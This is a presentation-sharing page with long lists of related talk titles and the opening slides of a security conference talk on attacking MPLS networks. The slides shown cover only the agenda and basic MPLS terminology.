6TiSCH + RPL @ Telecom Bretagne 2014
 
Multicast in OpenStack
Multicast in OpenStackMulticast in OpenStack
Multicast in OpenStack
 
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
The Role of the Communication Protocols in the IoT: Pitfalls and AdvantagesThe Role of the Communication Protocols in the IoT: Pitfalls and Advantages
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
 
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGatePLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
 
Haystack + DASH7 Security
Haystack + DASH7 SecurityHaystack + DASH7 Security
Haystack + DASH7 Security
 
Summit 16: Open Baton Overview
Summit 16: Open Baton OverviewSummit 16: Open Baton Overview
Summit 16: Open Baton Overview
 
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
 
Why I should Model my Network
Why I should Model my NetworkWhy I should Model my Network
Why I should Model my Network
 
Bringing Better Networking to LTE IoT
Bringing Better Networking to LTE IoTBringing Better Networking to LTE IoT
Bringing Better Networking to LTE IoT
 
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
I/O virtualization with InfiniBand and 40 Gigabit EthernetI/O virtualization with InfiniBand and 40 Gigabit Ethernet
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
 
Kubernetes OpenContrail Meetup
Kubernetes OpenContrail MeetupKubernetes OpenContrail Meetup
Kubernetes OpenContrail Meetup
 

Destaque

Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1PacSecJP
 
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japaneseAndersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanesePacSecJP
 
Kochetova+osipv atm how_to_make_the_fraud__final
Kochetova+osipv atm how_to_make_the_fraud__finalKochetova+osipv atm how_to_make_the_fraud__final
Kochetova+osipv atm how_to_make_the_fraud__finalPacSecJP
 
Pac sec2016 flyer_agenda
Pac sec2016 flyer_agendaPac sec2016 flyer_agenda
Pac sec2016 flyer_agendaPacSecJP
 
Adam Laurie, Blue Toot -pacsec-2015
Adam Laurie, Blue Toot -pacsec-2015Adam Laurie, Blue Toot -pacsec-2015
Adam Laurie, Blue Toot -pacsec-2015PacSecJP
 
Marc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2_jaMarc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2_jaPacSecJP
 
Filippo, Plain simple reality of entropy
Filippo, Plain simple reality of  entropyFilippo, Plain simple reality of  entropy
Filippo, Plain simple reality of entropyPacSecJP
 
Martin UPnP - pacsec -final-ja
Martin UPnP - pacsec -final-jaMartin UPnP - pacsec -final-ja
Martin UPnP - pacsec -final-jaPacSecJP
 
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingRichard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingPacSecJP
 
Maxim Goncharov, BPHS pac_sec
Maxim Goncharov, BPHS pac_secMaxim Goncharov, BPHS pac_sec
Maxim Goncharov, BPHS pac_secPacSecJP
 
Mickey threats inside your platform final
Mickey  threats inside your platform finalMickey  threats inside your platform final
Mickey threats inside your platform finalPacSecJP
 
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
Andersson hacking ds_mx_with_sdr_pac_sec_2016_englishAndersson hacking ds_mx_with_sdr_pac_sec_2016_english
Andersson hacking ds_mx_with_sdr_pac_sec_2016_englishPacSecJP
 
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 englishJonathan Andersson, attacking IoT with SDR pacsec 2015 english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 englishPacSecJP
 
James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator actionPacSecJP
 
Richard high performance fuzzing ja
Richard  high performance fuzzing jaRichard  high performance fuzzing ja
Richard high performance fuzzing jaPacSecJP
 
Mickey, threats inside your platform final
Mickey,  threats inside your platform finalMickey,  threats inside your platform final
Mickey, threats inside your platform finalPacSecJP
 
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...PacSecJP
 
kyoungju_kwak_the_new_wave_of_cyber_terror
kyoungju_kwak_the_new_wave_of_cyber_terrorkyoungju_kwak_the_new_wave_of_cyber_terror
kyoungju_kwak_the_new_wave_of_cyber_terrorPacSecJP
 
Stuart attacking http2 implementations truefinal-jp
Stuart  attacking http2 implementations truefinal-jpStuart  attacking http2 implementations truefinal-jp
Stuart attacking http2 implementations truefinal-jpPacSecJP
 
Filippo, plain simple reality of entropy ja
Filippo, plain simple reality of entropy jaFilippo, plain simple reality of entropy ja
Filippo, plain simple reality of entropy jaPacSecJP
 

Destaque (20)

Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1
 
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japaneseAndersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
Andersson hacking ds_mx_with_sdr_pac_sec_2016_japanese
 
Kochetova+osipv atm how_to_make_the_fraud__final
Kochetova+osipv atm how_to_make_the_fraud__finalKochetova+osipv atm how_to_make_the_fraud__final
Kochetova+osipv atm how_to_make_the_fraud__final
 
Pac sec2016 flyer_agenda
Pac sec2016 flyer_agendaPac sec2016 flyer_agenda
Pac sec2016 flyer_agenda
 
Adam Laurie, Blue Toot -pacsec-2015
Adam Laurie, Blue Toot -pacsec-2015Adam Laurie, Blue Toot -pacsec-2015
Adam Laurie, Blue Toot -pacsec-2015
 
Marc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2_jaMarc schoenefeld grandma‘s old handbag_draft2_ja
Marc schoenefeld grandma‘s old handbag_draft2_ja
 
Filippo, Plain simple reality of entropy
Filippo, Plain simple reality of  entropyFilippo, Plain simple reality of  entropy
Filippo, Plain simple reality of entropy
 
Martin UPnP - pacsec -final-ja
Martin UPnP - pacsec -final-jaMartin UPnP - pacsec -final-ja
Martin UPnP - pacsec -final-ja
 
Richard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzingRichard Johnson, high performance fuzzing
Richard Johnson, high performance fuzzing
 
Maxim Goncharov, BPHS pac_sec
Maxim Goncharov, BPHS pac_secMaxim Goncharov, BPHS pac_sec
Maxim Goncharov, BPHS pac_sec
 
Mickey threats inside your platform final
Mickey  threats inside your platform finalMickey  threats inside your platform final
Mickey threats inside your platform final
 
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
Andersson hacking ds_mx_with_sdr_pac_sec_2016_englishAndersson hacking ds_mx_with_sdr_pac_sec_2016_english
Andersson hacking ds_mx_with_sdr_pac_sec_2016_english
 
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 englishJonathan Andersson, attacking IoT with SDR pacsec 2015 english
Jonathan Andersson, attacking IoT with SDR pacsec 2015 english
 
James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator action
 
Richard high performance fuzzing ja
Richard  high performance fuzzing jaRichard  high performance fuzzing ja
Richard high performance fuzzing ja
 
Mickey, threats inside your platform final
Mickey,  threats inside your platform finalMickey,  threats inside your platform final
Mickey, threats inside your platform final
 
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
 
kyoungju_kwak_the_new_wave_of_cyber_terror
kyoungju_kwak_the_new_wave_of_cyber_terrorkyoungju_kwak_the_new_wave_of_cyber_terror
kyoungju_kwak_the_new_wave_of_cyber_terror
 
Stuart attacking http2 implementations truefinal-jp
Stuart  attacking http2 implementations truefinal-jpStuart  attacking http2 implementations truefinal-jp
Stuart attacking http2 implementations truefinal-jp
 
Filippo, plain simple reality of entropy ja
Filippo, plain simple reality of entropy jaFilippo, plain simple reality of entropy ja
Filippo, plain simple reality of entropy ja
 

Semelhante a Georgi Geshev, warranty void if label removed

CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment OverviewCISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment OverviewAmeen Wayok
 
2018 FRSecure CISSP Mentor Program- Session 7
2018 FRSecure CISSP Mentor Program- Session 72018 FRSecure CISSP Mentor Program- Session 7
2018 FRSecure CISSP Mentor Program- Session 7FRSecure
 
Mazharul Islam Khan (063457056)
Mazharul Islam Khan (063457056)Mazharul Islam Khan (063457056)
Mazharul Islam Khan (063457056)mashiur
 
MPLS (Multi-Protocol Label Switching)
MPLS  (Multi-Protocol Label Switching)MPLS  (Multi-Protocol Label Switching)
MPLS (Multi-Protocol Label Switching)NetProtocol Xpert
 
Tom Spence_01_22_2015_Resume
Tom Spence_01_22_2015_ResumeTom Spence_01_22_2015_Resume
Tom Spence_01_22_2015_ResumeTom Spence
 
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPTImplementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPTSatish Kumar
 
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...UA DevOps Conference
 
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...Positive Hack Days
 
Access Network Evolution
Access Network Evolution Access Network Evolution
Access Network Evolution Cisco Canada
 
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
ContainerDays Hamburg 2023 — Cilium Workshop.pdfContainerDays Hamburg 2023 — Cilium Workshop.pdf
ContainerDays Hamburg 2023 — Cilium Workshop.pdfRaphaël PINSON
 
Hong kongopenstack2013 sdn_bluehost
Hong kongopenstack2013 sdn_bluehostHong kongopenstack2013 sdn_bluehost
Hong kongopenstack2013 sdn_bluehostJun Park
 

Semelhante a Georgi Geshev, warranty void if label removed (20)

CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment OverviewCISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
CISCO Virtual Private LAN Service (VPLS) Technical Deployment Overview
 
Rohit profile
Rohit profileRohit profile
Rohit profile
 
2018 FRSecure CISSP Mentor Program- Session 7
2018 FRSecure CISSP Mentor Program- Session 72018 FRSecure CISSP Mentor Program- Session 7
2018 FRSecure CISSP Mentor Program- Session 7
 
Mazharul Islam Khan (063457056)
Mazharul Islam Khan (063457056)Mazharul Islam Khan (063457056)
Mazharul Islam Khan (063457056)
 
MPLS (Multi-Protocol Label Switching)
MPLS  (Multi-Protocol Label Switching)MPLS  (Multi-Protocol Label Switching)
MPLS (Multi-Protocol Label Switching)
 
Tom Spence_01_22_2015_Resume
Tom Spence_01_22_2015_ResumeTom Spence_01_22_2015_Resume
Tom Spence_01_22_2015_Resume
 
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPTImplementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers MAIN PPT
 
01 introduction to mpls
01 introduction to mpls 01 introduction to mpls
01 introduction to mpls
 
Rohit_resume
Rohit_resumeRohit_resume
Rohit_resume
 
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
СТАНІСЛАВ КОЛЕНКІН «Cilium – Network security for microservices. Let’s see ho...
 
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
ECI UTC Webinar MPLS-TP Value for Utilities-dec 2015
 
Mplsvpn seminar
Mplsvpn seminarMplsvpn seminar
Mplsvpn seminar
 
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
Обнаружение вредоносного кода в зашифрованном с помощью TLS трафике (без деши...
 
Himani_Yadav
Himani_YadavHimani_Yadav
Himani_Yadav
 
Ethernet basics
Ethernet basicsEthernet basics
Ethernet basics
 
Phifer 3 30_04
Phifer 3 30_04Phifer 3 30_04
Phifer 3 30_04
 
Mpls
MplsMpls
Mpls
 
Access Network Evolution
Access Network Evolution Access Network Evolution
Access Network Evolution
 
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
ContainerDays Hamburg 2023 — Cilium Workshop.pdfContainerDays Hamburg 2023 — Cilium Workshop.pdf
ContainerDays Hamburg 2023 — Cilium Workshop.pdf
 
Hong kongopenstack2013 sdn_bluehost
Hong kongopenstack2013 sdn_bluehostHong kongopenstack2013 sdn_bluehost
Hong kongopenstack2013 sdn_bluehost
 

Mais de PacSecJP

Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalPacSecJP
 
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02PacSecJP
 
Ryder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jpRyder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jpPacSecJP
 
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-jYuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-jPacSecJP
 
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_finalYuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_finalPacSecJP
 
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jpRouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jpPacSecJP
 
Rouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsecRouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsecPacSecJP
 
Di shen pacsec_jp-final
Di shen pacsec_jp-finalDi shen pacsec_jp-final
Di shen pacsec_jp-finalPacSecJP
 
Di shen pacsec_final
Di shen pacsec_finalDi shen pacsec_final
Di shen pacsec_finalPacSecJP
 
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-jaAnıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-jaPacSecJP
 
Anıl kurmuş pacsec3
Anıl kurmuş pacsec3Anıl kurmuş pacsec3
Anıl kurmuş pacsec3PacSecJP
 
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...PacSecJP
 
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...PacSecJP
 
Yunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7sins-pres_atm_v4(2)_jpYunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7sins-pres_atm_v4(2)_jpPacSecJP
 
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2PacSecJP
 
Shusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026_jpShusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026_jpPacSecJP
 
Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026PacSecJP
 
Kavya racharla ndh-naropanth_fin
Kavya racharla ndh-naropanth_finKavya racharla ndh-naropanth_fin
Kavya racharla ndh-naropanth_finPacSecJP
 
Lucas apa pacsec_slides_jp-final
Lucas apa pacsec_slides_jp-finalLucas apa pacsec_slides_jp-final
Lucas apa pacsec_slides_jp-finalPacSecJP
 
Lucas apa pacsec slides
Lucas apa pacsec slidesLucas apa pacsec slides
Lucas apa pacsec slidesPacSecJP
 

Mais de PacSecJP (20)

Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-final
 
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
 
Ryder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jpRyder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jp
 
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-jYuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
 
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_finalYuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
 
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jpRouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jp
 
Rouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsecRouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsec
 
Di shen pacsec_jp-final
Di shen pacsec_jp-finalDi shen pacsec_jp-final
Di shen pacsec_jp-final
 
Di shen pacsec_final
Di shen pacsec_finalDi shen pacsec_final
Di shen pacsec_final
 
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-jaAnıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-ja
 
Anıl kurmuş pacsec3
Anıl kurmuş pacsec3Anıl kurmuş pacsec3
Anıl kurmuş pacsec3
 
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
 
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
 
Yunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7sins-pres_atm_v4(2)_jpYunusov babin 7sins-pres_atm_v4(2)_jp
Yunusov babin 7sins-pres_atm_v4(2)_jp
 
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
 
Shusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026_jpShusei tomonaga pac_sec_20171026_jp
Shusei tomonaga pac_sec_20171026_jp
 
Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026Shusei tomonaga pac_sec_20171026
Shusei tomonaga pac_sec_20171026
 
Kavya racharla ndh-naropanth_fin
Kavya racharla ndh-naropanth_finKavya racharla ndh-naropanth_fin
Kavya racharla ndh-naropanth_fin
 
Lucas apa pacsec_slides_jp-final
Lucas apa pacsec_slides_jp-finalLucas apa pacsec_slides_jp-final
Lucas apa pacsec_slides_jp-final
 
Lucas apa pacsec slides
Lucas apa pacsec slidesLucas apa pacsec slides
Lucas apa pacsec slides
 

Último

Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...ICT Watch - Indonesia
 
2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______hackersuli
 
Annex K RBF's World Game Signals & Telemetry pdf
Annex K RBF's World Game Signals & Telemetry pdfAnnex K RBF's World Game Signals & Telemetry pdf
Annex K RBF's World Game Signals & Telemetry pdfSteven McGee
 
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)ICT Watch - Indonesia
 
The Reasons IV Cannulas Are Important in Modern Healthcare
The Reasons IV Cannulas Are Important in Modern HealthcareThe Reasons IV Cannulas Are Important in Modern Healthcare
The Reasons IV Cannulas Are Important in Modern HealthcareNanchang Kindly Meditech
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119APNIC
 
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...Andreas Sfakianakis
 
Tari Eason Warriors Come Out To Play T Shirts
Tari Eason Warriors Come Out To Play T ShirtsTari Eason Warriors Come Out To Play T Shirts
Tari Eason Warriors Come Out To Play T Shirtsrahman018755
 
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...vmzoxnx5
 
Power of Social Media for E-commerce.pdf
Power of Social Media for E-commerce.pdfPower of Social Media for E-commerce.pdf
Power of Social Media for E-commerce.pdfrajats19920
 
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYAHOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYAHotbet4d Slot
 

Último (11)

Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...Summary  ID-IGF 2016 National Dialogue  - English (tata kelola internet / int...
Summary ID-IGF 2016 National Dialogue - English (tata kelola internet / int...
 
2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______2024_hackersuli_mobil_ios_android ______
2024_hackersuli_mobil_ios_android ______
 
Annex K RBF's World Game Signals & Telemetry pdf
Annex K RBF's World Game Signals & Telemetry pdfAnnex K RBF's World Game Signals & Telemetry pdf
Annex K RBF's World Game Signals & Telemetry pdf
 
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)Summary  IGF 2013 Bali - English (tata kelola internet / internet governance)
Summary IGF 2013 Bali - English (tata kelola internet / internet governance)
 
The Reasons IV Cannulas Are Important in Modern Healthcare
The Reasons IV Cannulas Are Important in Modern HealthcareThe Reasons IV Cannulas Are Important in Modern Healthcare
The Reasons IV Cannulas Are Important in Modern Healthcare
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
Cyber Shield Up - They Shall Not Pass - Andreas Sfakianakis - Lecture at CSD ...
 
Tari Eason Warriors Come Out To Play T Shirts
Tari Eason Warriors Come Out To Play T ShirtsTari Eason Warriors Come Out To Play T Shirts
Tari Eason Warriors Come Out To Play T Shirts
 
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
办理澳洲USYD文凭证书学历认证【Q微/1954292140】办理悉尼大学毕业证书真实成绩单GPA修改/办理澳洲大学文凭证书Offer录取通知书/在读证明...
 
Power of Social Media for E-commerce.pdf
Power of Social Media for E-commerce.pdfPower of Social Media for E-commerce.pdf
Power of Social Media for E-commerce.pdf
 
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYAHOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
HOTBET4D SCATTER HITAM MAXWIN OLYMPUS TERPERCAYA
 

Georgi Geshev, warranty void if label removed

  • 1. Labs.mwrinfosecurity.com | © MWR Labs 1 Labs.mwrinfosecurity.com | © MWR Labs Warranty Void If Label Removed: Attacking MPLS Networks Tokyo, Japan G. Geshev
  • 2. Labs.mwrinfosecurity.com | © MWR Labs 4 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 3. Labs.mwrinfosecurity.com | © MWR Labs 5 Agenda • MPLS Technology • Previous MPLS Research • MPLS Attacks • VRF Hopping • Hardening • Future Research
  • 4. Labs.mwrinfosecurity.com | © MWR Labs 6 MPLS Technology What is MPLS? • Service Provider Networks • Multiprotocol Label Switching Architecture [RFC-3031] • IP Address (L3) vs. Label (L2) Lookups • Single Longest Prefix Match • Label Information Base (LIB) • Virtual Private Networks • MPLS L3VPN • MPLS L2VPN / Virtual Private LAN Services (VPLS)
  • 5. Labs.mwrinfosecurity.com | © MWR Labs 7 MPLS Terms What do we need to know? • Labels • Push, Pop, and Swap Operations • Reserved Labels • Label-Switching Router (LSR) • Provider Router (P) • Label Edge Router (LER) • Provider Edge Router (PE) • Label Switched Path (LSP) • Customer Edge Router (CE)
